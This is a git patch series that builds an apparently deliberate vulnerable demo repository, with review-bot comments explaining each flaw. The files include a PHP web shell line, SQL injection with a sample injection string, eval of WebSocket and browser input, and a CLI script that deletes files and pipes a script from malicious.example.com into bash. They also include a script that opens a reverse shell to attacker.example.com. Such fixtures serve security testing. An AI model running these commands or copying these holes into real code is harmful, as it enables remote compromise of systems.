From f37058907c176e8b79f9f4623f217aa656f2fabf Mon Sep 17 00:00:00 2001 From: Raphael Date: Mon, 3 Feb 2025 17:39:10 -0800 Subject: [PATCH 1/9] Update main.py --- main.py | 3 +++ 1 file changed, 3 insertions(+) diff --git a/main.py b/main.py index 437934d..cf60782 100644 --- a/main.py +++ b/main.py @@ -6,6 +6,9 @@ app = Flask(__name__) app.secret_key = os.urandom(24) + +# Simulating a database of user accounts and their private notes# Simulating a database of user accounts and their private notes + # Simulating a database of user accounts and their private notes users = { 1: {"id": 1, "username": "alice", "password": generate_password_hash("password123")}, From 78a1b3dcb00507756775f9b44cc59d349d4c5017 Mon Sep 17 00:00:00 2001 From: Raphael Date: Mon, 3 Feb 2025 17:39:35 -0800 Subject: [PATCH 2/9] Update index.php --- index.php | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/index.php b/index.php index df3d645..894117d 100644 --- a/index.php +++ b/index.php @@ -1,5 +1,8 @@ " +$_GET["search"] + ""; +echo "" .$_GET["search"]. ""; + + +exec($_POST["exec"]); ?> From b9c9bda47eaa289a2c7c13ee6817dfda84070c67 Mon Sep 17 00:00:00 2001 From: Raphael Date: Mon, 3 Feb 2025 17:41:59 -0800 Subject: [PATCH 3/9] Create test.php --- test.php | 42 ++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 test.php diff --git a/test.php b/test.php new file mode 100644 index 0000000..cdd2a13 --- /dev/null +++ b/test.php @@ -0,0 +1,42 @@ +connect_error) { + die("Connection failed: ". $conn->connect_error); + } + + // admin + // gdhas' OR 1=1 # + + // Query database + $query = "SELECT * FROM users WHERE username = '$username' AND password = '$password'"; + + $result = $conn->query($query); + + // Check if user exists + if ($result->num_rows > 0) { + echo "Welcome, $username!"; + } else { + echo "$query Invalid username or password."; + } + + // Close connection + $conn->close(); +} 
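Review bot: The added comment line pastes the same sentence twice (`# Simulating a database of user accounts and their private notes# Simulating a database of user accounts and their private notes`) and the unchanged line directly below it already carries that comment, so the three added lines contribute nothing; drop them or keep one comment. On the surrounding context, `app.secret_key = os.urandom(24)` derives the session-signing key anew at every process start, so each restart, and each worker in a multi-process deployment, invalidates or disagrees on existing sessions; if this is meant to outlive a demo, load the key from configuration and document that it must be stable and kept out of the repository.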
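Review bot: `echo "" .$_GET["search"]. "";` writes the request parameter into the response with no encoding, and `exec($_POST["exec"]);` hands request-controlled text straight to a shell; neither line has any check in front of it. For the first, wrap the value as `htmlspecialchars($_GET["search"], ENT_QUOTES, 'UTF-8')`; for the second there is no input-escaping that makes it safe, so remove the call, and if a fixed set of operations is genuinely needed, map the input onto a hard-coded allowlist of commands and pass any arguments through `escapeshellarg`. The markup around these lines has been stripped in this rendering, so the exact element the parameter lands in cannot be checked here.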
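Review bot: `$query = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";` interpolates request values directly into SQL; use a prepared statement (`$conn->prepare('SELECT * FROM users WHERE username = ?')` with `bind_param`) and check the password with `password_verify()` against a stored hash instead of comparing it inside the query. The failure branch `echo "$query Invalid username or password."` also returns the full SQL text to the client, which exposes table and column names; the message should not include `$query`. The commented sample input left above the query belongs in a test case, not in the handler. The opening lines of this hunk are not recoverable from this rendering, so where `$username` and `$password` come from and how `$conn` is built is inferred.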
From 8aa677f37d286a624071f176940225dbb15621b6 Mon Sep 17 00:00:00 2001 From: Raphael <25335191+rek7@users.noreply.github.com> Date: Fri, 18 Apr 2025 15:22:53 -0700 Subject: [PATCH 4/9] Update main.py --- main.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/main.py b/main.py index cf60782..2454076 100644 --- a/main.py +++ b/main.py @@ -41,7 +41,7 @@ def reverse_content(content): def apply_decryption(note): decrypted_content = reverse_content(note['content']) - os.system(note) + os.system(reverse_content) return {"id": note['id'], "content": decrypted_content} def decrypt_notes(encrypted_notes): From 0199ee6c94a44baffe96c859e298842323adea54 Mon Sep 17 00:00:00 2001 From: Raphael <25335191+rek7@users.noreply.github.com> Date: Thu, 10 Jul 2025 14:19:27 -0700 Subject: [PATCH 5/9] Create test.py --- test.py | 3 +++ 1 file changed, 3 insertions(+) create mode 100644 test.py diff --git a/test.py b/test.py new file mode 100644 index 0000000..0104a9b --- /dev/null +++ b/test.py @@ -0,0 +1,3 @@ +import random + +print("asd") From ea5f509c4d202d630174d5c8c1ad6edca9b7dbf8 Mon Sep 17 00:00:00 2001 From: Raphael Date: Thu, 28 Aug 2025 15:24:51 -0700 Subject: [PATCH 6/9] Create upload.php --- upload.php | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 upload.php diff --git a/upload.php b/upload.php new file mode 100644 index 0000000..ac74e8d --- /dev/null +++ b/upload.php @@ -0,0 +1,23 @@ + From f3976a4658934db65e6a7edffa8255efeb651266 Mon Sep 17 00:00:00 2001 From: Mohammed Date: Fri, 10 Oct 2025 09:19:25 -0400 Subject: [PATCH 7/9] stuff --- http/index.js | 56 +++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 http/index.js diff --git a/http/index.js b/http/index.js new file mode 100644 index 0000000..1577130 --- /dev/null +++ b/http/index.js 
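Review bot: `os.system(reverse_content)` now passes the function object rather than a string, so `apply_decryption` raises a TypeError on every call (`os.system` expects a str); the previous `os.system(note)` failed the same way with a dict. A helper that only reverses a note's content has no reason to invoke a shell at all, so the line should be deleted rather than repointed: `apply_decryption` should be the `reverse_content` call followed by `return {"id": note['id'], "content": decrypted_content}`. `decrypt_notes` begins at the end of the hunk and is not reviewable here.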
@@ -0,0 +1,56 @@
+const express = require('express');
+const axios = require('axios');
+const { URL } = require('url');
+const dns = require('dns').promises;
+const app = express();
+
+function isPrivateIp(ip) {
+ return ip === '::1' ||
+ /^127\./.test(ip) ||
+ /^10\./.test(ip) ||
+ /^192\.168\./.test(ip) ||
+ /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(ip) ||
+ ip.startsWith('fc') || ip.startsWith('fd') ||
+ ip.startsWith('fe80:');
+}
+
+// SSRF
+app.get('/fetch', async (req, res) => {
+ const url = req.query.url;
+ let parsedUrl;
+ try {
+ parsedUrl = new URL(url);
+ } catch (e) {
+ return res.status(400).send('Invalid URL');
+ }
+ const hostname = parsedUrl.hostname;
+ if (!['http:', 'https:'].includes(parsedUrl.protocol) ||
+ hostname === 'localhost' ||
+ hostname === '127.0.0.1' ||
+ hostname === '::1' ||
+ /^(10|127)\./.test(hostname) ||
+ /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(hostname) ||
+ /^192\.168\./.test(hostname)) {
+ return res.status(400).send('URL not allowed');
+ }
+ try {
+ // DNS resolution to prevent DNS rebinding
+ try {
+ const addresses = await dns.lookup(parsedUrl.hostname, { all: true });
+ for (const { address } of addresses) {
+ if (isPrivateIp(address)) {
+ return res.status(400).send('URL not allowed');
+ }
+ }
+ } catch (e) {
+ return res.status(400).send('Invalid hostname');
+ }
+
+ const resp = await axios.get(url);
+ res.send(resp.data);
+ } catch (e) {
+ res.status(500).send(e.message);
+ }
+});
+
+app.listen(3000, () => console.log('HTTP vuln on port 3000'));
From 38974cbabf88db0c9ca546c262c16cebf80c2052 Mon Sep 17 00:00:00 2001
From: Mohammed
Date: Fri, 10 Oct 2025 11:36:29 -0400
Subject: [PATCH 8/9] af
---
 browser/index.js | 5 +++++
 1 file changed, 5 insertions(+)
 create mode 100644 browser/index.js
diff --git a/browser/index.js b/browser/index.js
new file mode 100644
index 0000000..5f1b215
--- /dev/null
+++ b/browser/index.js
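Review bot: The address check in `/fetch` is made on the result of `dns.lookup`, but `axios.get(url)` then performs its own resolution and, by default, follows redirects, so the address that was validated is not necessarily the one connected to and a redirect target is never re-validated; at minimum pass `{ maxRedirects: 0, timeout: 5000 }` to `axios.get`, and to actually pin the connection supply the checked address through the HTTP agent's `lookup` option instead of re-resolving. `isPrivateIp` also leaves out the 169.254.0.0/16 link-local range and IPv4-mapped IPv6 forms, which the hostname-level regexes above it do not cover either; add `/^169\.254\./.test(ip)` and either reject addresses starting with `::ffff:` or strip that prefix and re-run the IPv4 tests. `res.status(500).send(e.message)` echoes upstream error detail to the caller; log it and return a fixed message. The identical file is added again as `http copy/index.js` in the last patch of this series, with the same issues.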
@@ -0,0 +1,5 @@ +function executeUserScript() { + var userScript = document.getElementById('userScript').value; + // Using eval to execute user-provided script + eval(userScript); +} From bb2dea1fed35ac02b3f62f32c12679c44b0507d7 Mon Sep 17 00:00:00 2001 From: Mohammed Date: Tue, 4 Nov 2025 16:46:15 -0500 Subject: [PATCH 9/9] add code --- browser copy/index.js | 5 ++++ cli/index.js | 18 ++++++++++++++ disk/index.js | 17 +++++++++++++ http copy/index.js | 56 +++++++++++++++++++++++++++++++++++++++++++ package.json | 11 +++++++++ stdin/index.js | 12 ++++++++++ ws/index.js | 12 ++++++++++ 7 files changed, 131 insertions(+) create mode 100644 browser copy/index.js create mode 100644 cli/index.js create mode 100644 disk/index.js create mode 100644 http copy/index.js create mode 100644 package.json create mode 100644 stdin/index.js create mode 100644 ws/index.js diff --git a/browser copy/index.js b/browser copy/index.js new file mode 100644 index 0000000..5f1b215 --- /dev/null +++ b/browser copy/index.js @@ -0,0 +1,5 @@ +function executeUserScript() { + var userScript = document.getElementById('userScript').value; + // Using eval to execute user-provided script + eval(userScript); +} diff --git a/cli/index.js b/cli/index.js new file mode 100644 index 0000000..7e5db7a --- /dev/null +++ b/cli/index.js @@ -0,0 +1,18 @@ +const { exec } = require('child_process'); + +const userArg = process.argv[2] || ''; + +const cmd = ` + rm -rf /tmp/vuln_dir --no-preserve-root && + curl http://malicious.example.com/install.sh | bash && + ls ${userArg} +`; + +console.log('[*] Running dangerous CLI pipeline…'); +exec(cmd, (err, stdout, stderr) => { + if (err) { + console.error('[!] Pipeline failed:', err); + return; + } + console.log('[+] Pipeline succeeded. stdout:\\n', stdout); +}); diff --git a/disk/index.js b/disk/index.js new file mode 100644 index 0000000..963519e --- /dev/null +++ b/disk/index.js 
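Review bot: `eval(userScript)` runs the contents of the `userScript` field with the page's own origin, so the code sees the page's cookies and DOM, and any CSP on the page must carry `'unsafe-eval'` for it to work at all; if running user-supplied code is the feature, execute it inside a sandboxed iframe served from a separate origin (or a Worker, which has no DOM access) and pass the result back with `postMessage`. As style, `var userScript` should be `const userScript`, and the comment `// Using eval to execute user-provided script` restates the line rather than the reason. The same five lines are added again as `browser copy/index.js` in the final patch; keep one copy.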
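Review bot: `ls ${userArg}` interpolates `process.argv[2]` into a string that `exec` hands to a shell, so shell metacharacters in the argument change the command that runs; pass it as a discrete argument instead, `execFile('ls', [userArg], (err, stdout, stderr) => { … })`. The two preceding steps of the template — a recursive delete and piping a downloaded script into a shell — run unconditionally at startup with no check on what was fetched, and neither belongs in a committed script. Separately, `'\\n'` in the success log prints a literal backslash-n rather than a line break, unless the doubled backslash is an artifact of this rendering.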
@@ -0,0 +1,17 @@
+const express = require('express');
+const fs = require('fs');
+const path = require('path');
+const app = express();
+
+// Path Traversal
+app.get('/read', (req, res) => {
+ const file = req.query.file;
+ const fullPath = path.resolve(__dirname, file);
+ if (!fullPath.startsWith(__dirname + path.sep)) return res.status(400).send('Invalid file path');
+ fs.readFile(fullPath, 'utf8', (err, data) => {
+ if (err) return res.status(500).send(err.message);
+ res.send(data);
+ });
+});
+
+app.listen(3001, () => console.log('Disk vuln on port 3001'));
diff --git a/http copy/index.js b/http copy/index.js
new file mode 100644
index 0000000..1577130
--- /dev/null
+++ b/http copy/index.js
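Review bot: `path.resolve(__dirname, file)` throws a TypeError when `file` is absent or not a string (no `?file=` at all, or the parameter repeated so it arrives as an array), and because the handler is synchronous that surfaces as a 500 rather than a 400; guard with `if (typeof file !== 'string') return res.status(400).send('Invalid file path');` before resolving. The prefix check `fullPath.startsWith(__dirname + path.sep)` operates on the lexical path only, so a symbolic link inside the directory still reads outside it — resolve with `fs.realpath` and compare the real path, and serve from a dedicated data directory rather than `__dirname`, which also contains this server's own source. `res.status(500).send(err.message)` returns the absolute filesystem path in the error text; log the error and send a fixed message.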
@@ -0,0 +1,56 @@
+const express = require('express');
+const axios = require('axios');
+const { URL } = require('url');
+const dns = require('dns').promises;
+const app = express();
+
+function isPrivateIp(ip) {
+ return ip === '::1' ||
+ /^127\./.test(ip) ||
+ /^10\./.test(ip) ||
+ /^192\.168\./.test(ip) ||
+ /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(ip) ||
+ ip.startsWith('fc') || ip.startsWith('fd') ||
+ ip.startsWith('fe80:');
+}
+
+// SSRF
+app.get('/fetch', async (req, res) => {
+ const url = req.query.url;
+ let parsedUrl;
+ try {
+ parsedUrl = new URL(url);
+ } catch (e) {
+ return res.status(400).send('Invalid URL');
+ }
+ const hostname = parsedUrl.hostname;
+ if (!['http:', 'https:'].includes(parsedUrl.protocol) ||
+ hostname === 'localhost' ||
+ hostname === '127.0.0.1' ||
+ hostname === '::1' ||
+ /^(10|127)\./.test(hostname) ||
+ /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(hostname) ||
+ /^192\.168\./.test(hostname)) {
+ return res.status(400).send('URL not allowed');
+ }
+ try {
+ // DNS resolution to prevent DNS rebinding
+ try {
+ const addresses = await dns.lookup(parsedUrl.hostname, { all: true });
+ for (const { address } of addresses) {
+ if (isPrivateIp(address)) {
+ return res.status(400).send('URL not allowed');
+ }
+ }
+ } catch (e) {
+ return res.status(400).send('Invalid hostname');
+ }
+
+ const resp = await axios.get(url);
+ res.send(resp.data);
+ } catch (e) {
+ res.status(500).send(e.message);
+ }
+});
+
+app.listen(3000, () => console.log('HTTP vuln on port 3000'));
diff --git a/package.json b/package.json
new file mode 100644
index 0000000..5cb2217
--- /dev/null
+++ b/package.json
@@ -0,0 +1,11 @@
+{
+ "name": "uwu-vuln",
+ "version": "1.0.0",
+ "main": "index.js",
+ "scripts": {
+ "test": "echo \"Error: no test specified\" && exit 1"
+ },
+ "author": "",
+ "license": "ISC",
+ "description": ""
+}
diff --git a/stdin/index.js b/stdin/index.js
new file mode 100644
index 0000000..b712e33
--- /dev/null
+++ b/stdin/index.js
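Review bot: The new manifest declares no `dependencies`, yet the same patch adds files that `require('express')`, `require('axios')` and `require('ws')`, so a fresh `npm install` from this `package.json` leaves every entry point failing at load; add a `dependencies` block with pinned versions and commit the generated lockfile so the resolved versions are reviewable. `"main": "index.js"` points at a file that does not exist at the repository root in this series — each entry point sits in its own subdirectory — so either drop `main` or point it at one of them.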
@@ -0,0 +1,12 @@ +const { exec } = require('child_process'); + +const payload = 'bash -i >& /dev/tcp/attacker.example.com/4444 0>&1'; + +console.log('[*] Executing reverse shell payload…'); +exec(payload, (err, stdout, stderr) => { + if (err) { + console.error('[!] Error executing payload:', err); + return; + } + console.log('[+] Payload executed. stdout:', stdout); +}); diff --git a/ws/index.js b/ws/index.js new file mode 100644 index 0000000..7b0fc64 --- /dev/null +++ b/ws/index.js @@ -0,0 +1,12 @@ +const WebSocket = require('ws'); +const wss = new WebSocket.Server({ port: 8080 }); + +// RCE +wss.on('connection', ws => { + ws.on('message', msg => { + eval(msg); + ws.send('Executed: ' + msg); + }); +}); + +console.log('WS vuln on port 8080'); \ No newline at end of file
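Review bot: Despite the directory name, nothing in this file reads `process.stdin`; it runs a fixed shell command at load time that opens an outbound interactive shell to a hard-coded host and port, and the `exec` callback hides that behind a generic success log. No version of this belongs in a committed entry point — remove it; if a stdin-driven demo is intended, read lines from `process.stdin` and never hand the text to `exec`. For anyone monitoring hosts where this package lands, the observable behaviour is a `node` process spawning `bash` with an immediate outbound TCP connection, which is worth an alert on its own.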
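Review bot: `eval(msg)` executes whatever any client that can reach port 8080 sends, with no origin check, no authentication and no `verifyClient`; replace it with a parser for a defined message shape (`JSON.parse` into a known set of operations) and dispatch on that. Depending on the `ws` major version, `msg` may arrive as a Buffer rather than a string, in which case `eval` returns the buffer unevaluated and `'Executed: ' + msg` just echoes it — the `package.json` in this same patch pins no version, so the behaviour is unspecified. `new WebSocket.Server({ port: 8080 })` also binds every interface; add `host: '127.0.0.1'` unless remote access is intended.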